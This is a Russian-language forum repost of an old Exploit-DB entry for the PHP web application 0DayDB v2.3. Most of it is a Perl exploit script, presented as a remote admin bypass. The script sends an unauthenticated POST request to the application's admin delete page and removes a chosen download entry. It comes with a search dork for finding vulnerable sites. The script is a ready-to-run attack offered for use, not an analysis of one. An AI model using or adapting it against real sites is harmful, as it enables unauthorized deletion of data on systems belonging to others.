Exploit 0DayDB 2.3 - 'id' Remote Authentication Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
4896
Проверка EDB
  1. Пройдено
Автор
PR0METHEUS
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2008-01-11
Код:
#!/usr/bin/perl
#Autor : Pr0metheuS
#Script : 0DayDB v2.3
#Version : v2.3
#Dork : "Powered By 0DayDB v2.3"
#Gr33tz-Team.org
use LWP::UserAgent;
if(@ARGV!=3){
	print "*****************\n";
	print "0DayDB v2.3 Remote Admin Bypass\n";
    print "perl $0 <site> <path> <id>\n";
    print "downloads ID for delete\n";
    print "*****************\n";
}
($site,$path,$id)=@ARGV;
sub pri {
	print "*****************\n";
	print "[+] Exploit completed\n";
	print "*****************";
}
sub con {
$ua = new LWP::UserAgent;
$ua->agent("Mozilla/8.0");
$ua = LWP::UserAgent->new;
my $req = HTTP::Request->new(POST => "".$site."".$path."/acp/delete.php");
$req->content_type('application/x-www-form-urlencoded');
$req->content("id=".$id."");
$res = $ua->request($req);
if ($res->is_success) {
	pri();
}
}
con();

# milw0rm.com [2008-01-11]
 
Источник
www.exploit-db.com

Похожие темы